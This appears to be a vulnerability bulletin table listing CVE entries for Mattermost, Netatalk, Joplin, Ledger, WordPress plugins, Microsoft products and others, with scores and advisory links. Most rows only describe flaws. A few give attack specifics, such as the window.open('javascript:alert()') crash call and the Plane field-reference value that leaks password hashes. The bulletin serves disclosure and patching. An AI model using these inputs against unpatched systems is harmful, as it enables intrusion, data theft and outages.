| ktulhu--Bigfishgames Syndicate | The Bigfishgames Syndicate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the bigfishgames_syndicate_submenu() function. This makes it possible for unauthenticated attackers to reset plugin settings and update them via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-6452 | https://www.wordfence.com/threat-intel/vulnerabilities/id/67877a2e-a45d-4674-b749-05d9217ef6bf?source=cve https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L238 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L238 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L169 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L169 |
| langgenius--dify | Dify version 1.14.1 and prior contain an authorization bypass vulnerability in the file preview endpoint that allows any authenticated user to read up to 3,000 characters of any uploaded document across all tenants and workspaces using only the file's UUID. Attackers can access the /console/api/files/{file_id}/preview endpoint with an intercepted file UUID to extract sensitive content from documents without ownership or workspace permission verification. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 5.9 | CVE-2026-41949 | https://huntr.com/bounties/d50a0240-7951-4939-b989-9bded66c7682 https://github.com/langgenius/dify/pull/35797 https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-preview-endpoint |
| laurent22--joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.6.14 and prior contain a Denial of Service (DoS) vulnerability in the title input functionality due to a lack of proper length validation. This flaw allows an attacker to cause an Out Of Memory (OOM) error and subsequent program termination by inserting an excessively long string into a note's title. This can be triggered either through direct user interface (UI) input or programmatically via the local web service API after compromising an authentication token. There are 2 primary methods of exploitation: via User Interface (UI) Input, and the Local Web Service API. A local user can directly type or paste an extremely long string into the title field when creating or editing a note Joplin runs a local web service (typically on port 41184) that allows programmatic interaction, such as creating or editing notes via HTTP API calls. If an attacker manages to exfiltrate or compromise the user's authentication token (e.g., through malware on the local system, or other local vulnerabilities), they can then send a crafted HTTP POST request to this local API. By including an excessively long string in the title parameter of this request, the application will attempt to allocate an unbounded amount of memory. This issue has been patched in version 3.7.1. | 2026-05-19 | 5.5 | CVE-2025-57798 | https://github.com/laurent22/joplin/security/advisories/GHSA-6jm8-gr87-q69x https://github.com/laurent22/joplin/commit/5b8795da446a5a40c9e212c98b35e368ffce628e |
| laurent22--joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create -> delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3. | 2026-05-19 | 5.7 | CVE-2026-34600 | https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94 https://github.com/laurent22/joplin/issues/14110 https://github.com/laurent22/joplin/pull/14289 |
| Ledger--Ledger Bitcoin app | Ledger Bitcoin app versions 2.1.0 and 2.1.1 contain an address derivation vulnerability that allows attackers to cause incorrect Bitcoin addresses to be displayed by exploiting improper handling of miniscript policies containing the a: fragment. Attackers can craft malicious miniscript policies that cause the device to derive and display incorrect receiving addresses, potentially leading to funds being sent to unintended addresses. | 2026-05-20 | 4 | CVE-2023-7346 | Ledger Security Bulletin 019 https://www.vulncheck.com/advisories/ledger-bitcoin-app-address-derivation-error-via-miniscript |
| Ledger--Ledger Nano X | Ledger Nano X, Flex, and Stax devices contain a denial of service vulnerability in the MCU firmware update process due to missing validation of the reset_handler parameter during firmware flashing. An attacker can provide a crafted reset_handler address pointing to invalid memory or attacker-controlled code to cause the device to enter an unrecoverable fault state during boot, resulting in permanent loss of operability. | 2026-05-19 | 4.6 | CVE-2025-15645 | Ledger Security Bulletin 021 https://www.vulncheck.com/advisories/ledger-nano-x-flex-stax-mcu-firmware-update-denial-of-service |
| Ledger--ledgerhq/hw-app-eth | Ledger Live with vulnerable versions of ledgerhq/hw-app-eth prior to 6.34.7 contains an integer parsing vulnerability that allows attackers to manipulate EIP-712 typed data messages by exploiting incorrect hexadecimal field parsing when values contain an odd number of characters. Attackers can obtain signatures on truncated or misinterpreted message values to authorize unintended blockchain transactions, such as asset transfers at incorrect amounts. | 2026-05-19 | 6.5 | CVE-2023-7345 | Ledger Security Bulletin 020 https://www.vulncheck.com/advisories/ledger-live-hw-app-eth-eip-712-message-parsing-integer-truncation |
| linlinjava--litemall | A security vulnerability has been detected in linlinjava litemall up to 1.8.0. Affected by this vulnerability is the function backup/load of the file litemall-db/src/main/java/org/linlinjava/litemall/db/util/DbUtil.java of the component Database Setting Handler. The manipulation of the argument db/password leads to argument injection. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 4.7 | CVE-2026-8773 | VDB-364398; linlinjava litemall Database Setting DbUtil.java load argument injection VDB-364398; CTI Indicators (IOB, IOC, TTP, IOA) Submit #811469; linlinjava litemall up to 1.8.0 Argument Injection https://gist.github.com/A1AAAAAAAAAA1/d5ae30a17744459e7cc5902fff32a35b |
| Live Networks, Inc.--LIVE555 | LIVE555 before 2026.04.22 contains an authorization bypass vulnerability in RTSP session command handling that allows attackers to replay valid Session tokens from unauthenticated connections. Attackers who obtain a valid Session token can issue PLAY and TEARDOWN commands from a second TCP connection without authentication, causing server crashes through virtual function call errors or disrupting active streams by terminating victim sessions. | 2026-05-19 | 5.9 | CVE-2026-41470 | https://gist.github.com/yhcho0405/ee9b67a96808ef19f22e8a4ee88c795f https://download.live555.com/ https://www.vulncheck.com/advisories/live555-rtsp-server-authorization-bypass-via-session-token |
| lykich--Correct Prices | The Correct Prices plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] variable in versions up to and including 1.0. This is due to the correct_prices_page() function echoing $_SERVER['PHP_SELF'] into a form's action attribute without any input sanitization or output escaping (such as esc_url() or esc_attr()). Because PHP_SELF reflects attacker-controlled path-info appended to the script URL, an attacker can break out of the attribute and inject arbitrary markup. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link. | 2026-05-20 | 6.1 | CVE-2026-8627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/605c6c53-6920-42ba-8784-b3a186bbf821?source=cve https://plugins.trac.wordpress.org/browser/correct-prices/trunk/correct_prices.php#L134 |
| Magepeople inc.--WpBookingly | Missing Authorization vulnerability in Magepeople inc. WpBookingly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpBookingly: from n/a through 1.2.9. | 2026-05-20 | 6.5 | CVE-2026-27405 | https://patchstack.com/database/wordpress/plugin/service-booking-manager/vulnerability/wordpress-wpbookingly-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve |
| makeplane--plane | Plane is an open-source project management tool. In versions 1.3.0 and below, SavedAnalyticEndpoint passes the user-controlled segment query parameter directly to a Django F() expression without validation (unlike the regular AnalyticsEndpoint, which checks against an allowlist), causing ORM Field Reference Injection. An authenticated workspace MEMBER can send GET /api/workspaces/<slug>/saved-analytic-view/<analytic_id>/ with a crafted segment value that is forwarded into build_graph_plot() and traverses foreign-key relationships (e.g. workspace__owner__password) before being projected via .values("dimension", "segment"), returning the referenced field values directly in the JSON response. This exposes sensitive data such as bcrypt password hashes, API tokens, and related users' email addresses, making it a stronger primitive than the related order_by injection where values are only leaked through ordering. This issue has been fixed in version 1.3.1. | 2026-05-20 | 6.5 | CVE-2026-40102 | https://github.com/makeplane/plane/security/advisories/GHSA-93x3-ghh7-72j3 https://github.com/makeplane/plane/releases/tag/v1.3.1 |
| manchumahara--CBX 5 Star Rating & Review | The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-05-22 | 6.1 | CVE-2026-6864 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee11e19-21a6-45df-a118-f6dec3b55bc1?source=cve https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-rating-avg-logs.php#L41 https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-review-logs.php#L41 https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-review-logs.php https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-rating-avg-logs.php |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page (bug_update_page.php), allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, leading to admin account takeover and full project data access. In order to exploit this issue, a textarea-type custom field must be configured for the project, and the attack must be carried out by an authenticated user with bug report permission (low privilege). This can affect any user viewing the bug edit form, including administrators. The issue has been fixed in version 2.28.2. If users cannot immediately upgrade, they can work around the issue by using the default Content-Security Policy, which blocks script execution. | 2026-05-20 | 5.4 | CVE-2026-39960 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-qj6w-v29q-4rgx https://github.com/mantisbt/mantisbt/commit/5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2. | 2026-05-19 | 4.3 | CVE-2026-34754 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206 https://mantisbt.org/bugs/view.php?id=36976 |
| Mattermost--Mattermost | Mattermost Mobile Apps versions <=2.37 11.4 2.0.37 11.0.4 11.1.3 11.3.2 10.11.11.0 fail to properly validate the SSO authentication callback origin which allows an attacker controlling a malicious Mattermost server to steal user credentials for a legitimate Mattermost server via relaying the SSO code exchange flow through the mobile application. Mattermost Advisory ID: MMSA-2025-00564 | 2026-05-21 | 6.1 | CVE-2026-22880 | MMSA-2025-00564 |
| Mattermost--Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to properly check for permissions when processing commands in the Gitlab plugin which allows normal users to uninstall instances or set up webhook connections via the {{gitlab instance {option}}} or the {{/gitlab webhook {option}}} commands. Mattermost Advisory ID: MMSA-2026-00600 | 2026-05-18 | 6.5 | CVE-2026-3117 | MMSA-2026-00600 |
| Mattermost--Mattermost | Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent an invalid URL from loading in a pop-up window in the Mattermost Desktop App which allows a malicious server owner to repeatedly crash the application via calling {{window.open('javascript:alert()');}}. Mattermost Advisory ID: MMSA-2026-00618 | 2026-05-18 | 6.5 | CVE-2026-3471 | MMSA-2026-00618 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to archive the channel before removing persistent notifications which allows an authenticated user to crash the server via timing the creation of a persistent notification message between the server deleting existing persistent notifications and archiving the channel. Mattermost Advisory ID: MMSA-2026-00637 | 2026-05-22 | 6.5 | CVE-2026-4635 | MMSA-2026-00637 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1 fail to verify channel membership when processing AI-assisted message rewrites which allows an authenticated attacker to read the content of threads in private channels and direct messages they do not have access to via a crafted request to the post rewrite endpoint. Mattermost Advisory ID: MMSA-2026-00645 | 2026-05-18 | 6.5 | CVE-2026-5163 | MMSA-2026-00645 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.2, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the TIFF IFD offset in the image header before allocating memory, which allows authenticated users with file upload or posting permissions to cause a denial of service (server OOM) via uploading a crafted TIFF file or posting a URL that serves one. Mattermost Advisory ID: MMSA-2026-00648 | 2026-05-22 | 6.5 | CVE-2026-5755 | MMSA-2026-00648 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to prevent disclosure of created user passwords which allows a malicious attacker to impersonate a user via the use of some of those passwords. Mattermost Advisory ID: MMSA-2026-00614 | 2026-05-18 | 6.5 | CVE-2026-6345 | MMSA-2026-00614 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the OAuth token scope on the callback which allows an authenticated Mattermost user to gain access to private repositories via modifying the scope parameter in the GitHub authorization URL. Mattermost Advisory ID: MMSA-2026-00628 | 2026-05-22 | 5.4 | CVE-2026-28735 | MMSA-2026-00628 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate file ownership and access control, which allows an authenticated user to access and download files belonging to other users or teams via crafted Boards API requests using valid file IDs. Mattermost Advisory ID: MMSA-2026-00620 | 2026-05-22 | 5.9 | CVE-2026-3473 | MMSA-2026-00620 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to limit the size of the request body on the start meeting API endpoint, which allows an authenticated attacker to cause resource exhaustion or denial of service via a crafted oversized HTTP POST request to {{/api/v1/meetings}}. Mattermost Advisory ID: MMSA-2026-00608 | 2026-05-18 | 4.3 | CVE-2026-2325 | MMSA-2026-00608 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to enforce slash command trigger-word uniqueness during command updates which allows an authenticated team member with Manage Own Slash Commands permission to hijack and impersonate existing system or custom slash commands via editing their own slash command trigger to an already-registered trigger through the command update API. Mattermost Advisory ID: MMSA-2026-00597 | 2026-05-18 | 4.3 | CVE-2026-28732 | MMSA-2026-00597 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate that a remote cluster has access to a channel before processing membership removal requests during shared channel membership sync, which allows a malicious remote cluster to remove any user from any channel, including private channels, via crafted membership sync messages targeting channels the remote cluster is not authorized to access. Mattermost Advisory ID: MMSA-2026-00576 | 2026-05-18 | 4.3 | CVE-2026-28759 | MMSA-2026-00576 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to sanitize team member data when returned via API to users without elevated permissions which allows a user without permissions to get data about team members' roles via invoking various team API endpoints. Mattermost Advisory ID: MMSA-2026-00626 | 2026-05-22 | 4.3 | CVE-2026-3636 | MMSA-2026-00626 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check the create_post channel permission during post edit operations which allows an authenticated attacker with revoked posting privileges to modify their existing posts via direct API requests to the post update and patch endpoints. Mattermost Advisory ID: MMSA-2026-00627 | 2026-05-18 | 4.3 | CVE-2026-3637 | MMSA-2026-00627 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1 fail to validate team-level run_create permission against the target team when creating a playbook run which allows an authenticated team member to create runs in teams where they lack permission via specifying a different team ID in the run creation API request. Mattermost Advisory ID: MMSA-2026-00629 | 2026-05-21 | 4.3 | CVE-2026-4055 | MMSA-2026-00629 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate user-supplied input in API request handlers which allows an authenticated attacker to crash the plugin process via a crafted HTTP request to the PR details endpoint. Mattermost Advisory ID: MMSA-2026-00638 | 2026-05-22 | 4.3 | CVE-2026-4646 | MMSA-2026-00638 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to enforce request body size limits on plugin HTTP endpoints which allows an attacker to cause a denial of service via crafted oversized HTTP requests. Mattermost Advisory ID: MMSA-2026-00646 | 2026-05-22 | 4.9 | CVE-2026-5308 | MMSA-2026-00646 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 11.4.x <= 11.4.3 fail to validate the X-Requested-With header on the burn-on-read reveal endpoint which allows an authenticated channel member to force the reveal of a burn-on-read message without recipient consent via a crafted Markdown image tag. Mattermost Advisory ID: MMSA-2026-00636 | 2026-05-18 | 4.3 | CVE-2026-6339 | MMSA-2026-00636 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate 7zip archive structure before processing which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted 7zip file with excessive folder declarations. Mattermost Advisory ID: MMSA-2026-00573 | 2026-05-18 | 4.3 | CVE-2026-6340 | MMSA-2026-00573 |
| Mattermost--Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to have API-level checks on which groups the user can create issues or attach comments to which allows a user that is a member of multiple groups to create issues in a locked group via direct API requests. Mattermost Advisory ID: MMSA-2026-00602 | 2026-05-18 | 4.3 | CVE-2026-6341 | MMSA-2026-00602 |
| Mattermost--Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to appropriately check for valid namespaces which allows plugin users to create subscriptions to groups that were not whitelisted via creating groups that share the same prefix as a whitelisted group. Mattermost Advisory ID: MMSA-2026-00601 | 2026-05-18 | 4.3 | CVE-2026-6342 | MMSA-2026-00601 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check public/private permissions which allows members without these permissions to access public playbooks via /get. Mattermost Advisory ID: MMSA-2026-00591 | 2026-05-18 | 4.3 | CVE-2026-6343 | MMSA-2026-00591 |
| mcinvale--Faces of Users | The Faces of Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'default' shortcode attribute in the 'facesofusers' shortcode in all versions up to, and including, 0.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 6.4 | CVE-2026-8038 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ea39d249-0345-4028-af58-31b298376950?source=cve https://plugins.trac.wordpress.org/browser/faces-of-users/trunk/faces-of.php#L62 https://plugins.trac.wordpress.org/browser/faces-of-users/tags/0.0.3/faces-of.php#L62 |
| Mesalvo--Meona Client Launcher Component | Cleartext Storage of Sensitive Information in Memory vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 6 | CVE-2026-0857 | https://seccore.at/blog/cves-meona/ |
| Mesalvo--Meona Client Launcher Component | Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 4.4 | CVE-2026-25602 | https://seccore.at/blog/cves-meona/ |
| Microsoft--Microsoft 365 Copilot | Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-22 | 6.5 | CVE-2026-42827 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft Defender Antimalware Platform | Microsoft Defender Denial of Service Vulnerability | 2026-05-20 | 4 | CVE-2026-45498 | Microsoft Defender Denial of Service Vulnerability |
| Microsoft--Microsoft Edge (Chromium-based) | Improper input validation in Microsoft Edge (Chromium-based) allows an unauthorized attacker to bypass a security feature over a network. | 2026-05-18 | 5.4 | CVE-2026-45492 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2026-05-18 | 5.4 | CVE-2026-45494 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| Microsoft--Windows 11 Version 24H2 | Microsoft is aware of a security feature bypass vulnerability in Windows publicly referred to as "YellowKey". The proof of concept for this vulnerability has been made public, violating coordinated vulnerability disclosure best practices. We are issuing this CVE to provide mitigation guidance that can be implemented to protect against this vulnerability until the security update is made available. Mitigation FAQs: Should I leverage the temporary mitigation? Microsoft recommends that you consider implementing these mitigations if you are concerned your devices and data are at risk of being compromised or stolen, for example, if your organization's employees take their work devices home or on business travel. What impact to service availability/management could be caused by implementing the mitigations? Implementing these mitigations will not impact service availability or management operations. Do customers need to revert the changes made to mitigate the vulnerability once the security update to protect against this vulnerability is available? No. The security update will maintain the mitigation's behavior once the security update is installed. I am using TPM+PIN, am I at risk of this vulnerability being exploited? No, if you are using TPM+PIN the vulnerability is not exploitable. | 2026-05-19 | 6.8 | CVE-2026-45585 | Windows BitLocker Security Feature Bypass Vulnerability |
| MongoDB, Inc.--C Driver | The MongoDB C Driver's legacy GridFS API accepts malformed file metadata from the database without adequate validation. Crafted documents in a GridFS collection may cause any application that reads those files via the legacy API to either crash (via a division-by-zero) or silently leak process memory contents (via an out-of-bounds read). | 2026-05-20 | 5.9 | CVE-2026-9100 | https://jira.mongodb.org/browse/CDRIVER-6281 |
| MongoDB, Inc.--Compass | Prototype pollution in csv parsing logic during import can lead to untrusted file paths (but not arguments) entering shell.openExternal after specific user behavior leading to "1-click" command execution. | 2026-05-20 | 4.3 | CVE-2026-9101 | https://jira.mongodb.org/browse/COMPASS-10657 |
| MongoDB, Inc.--MongoDB Server | Creating a "2dsphere_bucket" index on a non-timeseries bucket collection will succeed, but any subsequent attempt to insert a document which triggers updating that index will crash the server. A similar issue occurs when creating "queryable_encrypted_range" indices. This issue affects MongoDB Server v7.0 versions prior to 7.0.32, v8.0 versions prior to 8.0.21 and v8.2 versions prior to 8.2.6 | 2026-05-18 | 6.5 | CVE-2026-8843 | https://jira.mongodb.org/browse/SERVER-116327 |
| mrdollar4444--GSheet For Woo Importer | The GSheet For Woo Importer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the process_ajax_restore_action() function in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's Google Sheets API token and configuration options. | 2026-05-21 | 4.3 | CVE-2026-4843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d60991-0675-4efa-9427-380e6b59fe28?source=cve https://plugins.trac.wordpress.org/browser/import-products-from-gsheet-for-woo-importer/tags/2.3.1/src/Actions/AdminSettingsAction.php#L391 |
| n/a--Ettercap | A vulnerability has been found in Ettercap up to 0.8.3. The affected element is the function FUNC_DECODER of the file src/dissectors/ec_gg.c of the component GG Dissector. The manipulation of the argument gg leads to a heap-based buffer overflow. The attack can be carried out remotely. The complexity of an attack is rather high. The exploitability is described as difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 0.8.4 is sufficient to fix this issue. The identifier of the patch is feeae6fa366e01a3dd9f1857ec6aae847b2ae00c. It is suggested to upgrade the affected component. | 2026-05-24 | 5.6 | CVE-2026-9365 | VDB-365328; Ettercap GG Dissector ec_gg.c FUNC_DECODER heap-based overflow VDB-365328; CTI Indicators (IOB, IOC, IOA) Submit #813142; Ettercap <=v0.8.4 Heap-based Buffer Overflow https://github.com/Ettercap/ettercap/issues/1306 https://github.com/Ettercap/ettercap/pull/1307 https://github.com/Ettercap/ettercap/commit/feeae6fa366e01a3dd9f1857ec6aae847b2ae00c https://github.com/Ettercap/ettercap/ |
| n/a--exifreader | Versions of the package exifreader before 4.39.0 are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) due to decompressing PNG zTXt metadata without enforcing a built-in maximum decompressed output size. When asynchronous parsing is enabled, a crafted PNG file containing a highly compressed zTXt chunk can cause ExifReader to materialize a disproportionately large Comment value in memory. | 2026-05-19 | 5.3 | CVE-2026-8814 | https://security.snyk.io/vuln/SNYK-JS-EXIFREADER-16689340 https://gist.github.com/yuki-matsuhashi/cad1a45d936062438b4ab24613c34c55 https://github.com/mattiasw/ExifReader/commit/5f116128adc19f674902f8bf582bfe7dd0a36375 |
| n/a--JPress | A vulnerability was determined in JPress up to 1.0.3. The affected element is an unknown function of the file /ucenter/article/doWriteSave of the component UCenter Article Submission Endpoint. Manipulation of the argument id/userId can lead to improper authorization. The attack may be performed remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 6.3 | CVE-2026-9376 | VDB-365339; JPress UCenter Article Submission Endpoint doWriteSave improper authorization VDB-365339; CTI Indicators (IOB, IOC, TTP, IOA) Submit #813253; JPress 1.0.3 Improper Authorization https://github.com/JPressProjects/jpress/issues/194 |
| n/a--postcss | A vulnerability was determined in postcss up to 7.1.1. Affected is the function toString of the file src/selectors/container.js of the component AST Serialization. Manipulation can lead to uncontrolled recursion. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains that, according to its definition, "DoS on server-side on user-generated CSS is low risk for us (since most users compile own CSS with PostCSS)." | 2026-05-24 | 4.3 | CVE-2026-9358 | VDB-365321; postcss AST Serialization container.js toString recursion VDB-365321; CTI Indicators (IOB, IOC, TTP, IOA) Submit #813080; postcss-selector-parser postcss <= 7.1.1 CWE-674: Uncontrolled Recursion https://gist.github.com/bx33661/581e3a38134601c04e19b4dfc9b459b9 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport's p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11. | 2026-05-19 | 5.9 | CVE-2026-32134 | https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2 https://github.com/nanomq/nanomq/issues/2241 https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb https://github.com/nanomq/nanomq/releases/tag/0.24.11 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In versions prior to 2026, the Library module stores and serves uploaded images byte-for-byte, without stripping EXIF/XMP/IPTC metadata. Any authenticated user who downloaded an image could extract the uploader's embedded metadata, which included GPS coordinates, device information, timestamps, embedded comments/notes, thumbnail previews, and other personally identifiable information (PII) preserved in the image metadata. Of all FacturaScripts' image upload features, only the Library module combined unrestricted uploads, persistent storage, authenticated download access, and a total lack of server-side metadata sanitization. This vulnerability carries significant real-world impact: an employee uploading a photo taken at their home inadvertently discloses their precise home address to every user with Library download access. This issue has been fixed in version 2026. | 2026-05-18 | 6.5 | CVE-2026-27892 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-q7f2-rv22-2xgr https://github.com/NeoRazorX/facturascripts/commit/b0725147a61a9a377b7180589af33ff52b4751e2 |
| Netatalk--Netatalk | Netatalk 2.0.0 through 4.4.2 generates AFP session tokens derived from predictable process IDs, which allows a remote authenticated attacker to cause a denial of service by exploiting the reconnect mechanism. | 2026-05-21 | 6.5 | CVE-2026-44054 | Netatalk Security Advisory CVE-2026-44054 |
| Netatalk--Netatalk | A stack-based buffer overflow in desktop.c in Netatalk 1.3 through 4.2.2 allows a remote authenticated attacker to cause a denial of service, obtain limited information, or modify limited data. | 2026-05-21 | 6 | CVE-2026-44056 | Netatalk Security Advisory CVE-2026-44056 |
| Netatalk--Netatalk | An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism. | 2026-05-21 | 6.4 | CVE-2026-44058 | Netatalk Security Advisory CVE-2026-44058 |
| Netatalk--Netatalk | Insufficient sanitization of volume paths in Netatalk 3.1.0 through 4.4.2 allows a local privileged user to inject OS commands and execute arbitrary code via a crafted volume path. | 2026-05-21 | 6.7 | CVE-2026-44076 | Netatalk Security Advisory CVE-2026-44076 |
| Netatalk--Netatalk | Netatalk 1.5.0 through 4.4.2 uses DES-ECB for authentication with a timing side channel, which allows a remote attacker to recover authentication credentials via timing analysis. | 2026-05-21 | 5.9 | CVE-2026-44061 | Netatalk Security Advisory CVE-2026-44061 |
